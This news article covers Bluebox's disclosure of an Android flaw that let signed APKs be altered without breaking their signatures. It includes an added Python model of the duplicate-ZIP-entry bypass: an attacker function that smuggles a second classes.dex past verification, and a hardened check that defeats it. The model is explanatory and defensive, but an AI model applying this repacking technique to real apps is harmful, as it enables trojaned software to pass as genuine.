Security research firm Bluebox has disclosed a bug in Google's Android operating system that it says leaves around 99 percent of Android devices open to a serious attack. The flaw lets an attacker alter the code of an otherwise legitimate, signed app without invalidating its signature, so Android installs the modified app as if it were the genuine one. From there the attacker could steal information or take control of the device itself.
According to Bluebox CTO Jeff Forristal, the vulnerability has been present in Android for the last four years and could affect as many as 900 million devices around the world. Bluebox reported it to Google in February and will explain how the bug affects Android later this month at the Black Hat USA 2013 security conference in Las Vegas, Nevada.
“The vulnerability involves discrepancies in how Android applications are cryptographically verified & installed, allowing for APK code modification without breaking the cryptographic signature,” writes Forristal on the Bluebox corporate blog.
“All Android applications contain cryptographic signatures, which Android uses to determine if the app is legitimate and to verify that the app hasn’t been tampered with or modified. This vulnerability makes it possible to change an application’s code without affecting the cryptographic signature of the application – essentially allowing a malicious author to trick Android into believing the app is unchanged even if it has been.”
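The "discrepancy in how applications are verified and installed" that Forristal describes, as an added example that is not Bluebox's or Google's code. An APK is a ZIP archive, and the publicly documented cause of this bug was that the code path that verifies an APK's signature and the code path that later loads its contents disagreed about which copy of a duplicated entry name was "the" entry, so a second classes.dex could be smuggled in beside the signed one without touching anything under META-INF. The Python model below (standard library only) makes these modelling assumptions: an HMAC stands in for the RSA signature over the manifest, the verifier resolves entries by name and therefore sees the last duplicate (which is what Python's zipfile does), the loader walks the central directory and takes the first, and the hardening check at the end is the fix in spirit (reject archives with non-unique names) rather than Google's actual patch. All sample data is constructed inline.

```python
import hashlib
import hmac
import io
import warnings
import zipfile

# Stand-in for the developer's signing key: real APKs carry an RSA/DSA
# signature over the manifest; an HMAC models "only the key holder can
# produce a valid signature" well enough for this demonstration.
SIGNING_KEY = b"demo-signing-key"


def build_manifest(entries):
    """MANIFEST.MF-style listing: one digest line per payload file."""
    lines = [f"Name: {name}\nSHA-256-Digest: {hashlib.sha256(data).hexdigest()}\n\n"
             for name, data in sorted(entries.items())]
    return "".join(lines).encode()


def parse_manifest(manifest):
    digests, name = {}, None
    for line in manifest.decode().splitlines():
        if line.startswith("Name: "):
            name = line[len("Name: "):]
        elif line.startswith("SHA-256-Digest: ") and name:
            digests[name] = line[len("SHA-256-Digest: "):]
    return digests


def sign_apk(entries):
    """Build a signed APK-like zip from {path: bytes} (constructed sample data)."""
    manifest = build_manifest(entries)
    sig = hmac.new(SIGNING_KEY, manifest, hashlib.sha256).hexdigest().encode()
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
        zf.writestr("META-INF/MANIFEST.MF", manifest)
        zf.writestr("META-INF/CERT.SIG", sig)
    return buf.getvalue()


def verify(apk_bytes):
    """Pre-patch verifier model: check the signature over the manifest, then
    check each manifest digest against the entry looked up BY NAME.
    zipfile.read(name) resolves a duplicated name to the LAST copy."""
    zf = zipfile.ZipFile(io.BytesIO(apk_bytes))
    manifest = zf.read("META-INF/MANIFEST.MF")
    expected = hmac.new(SIGNING_KEY, manifest, hashlib.sha256).hexdigest().encode()
    if not hmac.compare_digest(zf.read("META-INF/CERT.SIG"), expected):
        return False
    return all(hashlib.sha256(zf.read(name)).hexdigest() == digest
               for name, digest in parse_manifest(manifest).items())


def load_code(apk_bytes, name="classes.dex"):
    """Loader model: walk the central directory in order and take the FIRST
    entry with the wanted name, as a differently written zip reader does."""
    zf = zipfile.ZipFile(io.BytesIO(apk_bytes))
    for info in zf.infolist():
        if info.filename == name:
            return zf.read(info)
    raise KeyError(name)


def inject_duplicate(apk_bytes, name, payload):
    """Attacker step: re-pack the zip with a second `name` entry placed before
    the original. META-INF is untouched, so the signature still verifies."""
    src = zipfile.ZipFile(io.BytesIO(apk_bytes))
    buf = io.BytesIO()
    with warnings.catch_warnings():
        warnings.simplefilter("ignore", UserWarning)  # zipfile warns on duplicate names
        with zipfile.ZipFile(buf, "w") as out:
            for info in src.infolist():
                if info.filename == name:
                    out.writestr(name, payload)               # attacker's copy comes first
                out.writestr(info.filename, src.read(info))  # original copy, matches manifest
    return buf.getvalue()


def verify_hardened(apk_bytes):
    """The fix in spirit (modelling assumption, not Google's patch): refuse any
    archive whose entry names are not unique, then run the normal checks."""
    names = zipfile.ZipFile(io.BytesIO(apk_bytes)).namelist()
    if len(names) != len(set(names)):
        return False
    return verify(apk_bytes)


if __name__ == "__main__":
    apk = sign_apk({"classes.dex": b"benign dex bytecode", "res/layout.xml": b"<ui/>"})
    trojaned = inject_duplicate(apk, "classes.dex", b"malicious dex bytecode")
    print("original  verify:", verify(apk), " loads:", load_code(apk))
    print("trojaned  verify:", verify(trojaned), " loads:", load_code(trojaned))
    print("hardened  verify:", verify_hardened(trojaned))
```

The point of the model is the mismatch between the two readers, not the signature scheme: the doctored archive passes verify() because every name in the manifest still resolves to a copy with the right digest, while load_code() hands the runtime the attacker's copy. Any check that looks at the archive through one parser and executes it through another is exposed the same way; verify_hardened() closes the gap by refusing to reason about an archive in which a name is ambiguous at all.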
Bluebox's corporate blog post, and how to scan a device for the vulnerability
Further coverage and commentary:
Black Hat 2013 conference
David Meyer's blog
The bug explained, and Google's patch
ZDNet's "truth about the latest Google security scare"
Symantec on this bug and the situation in China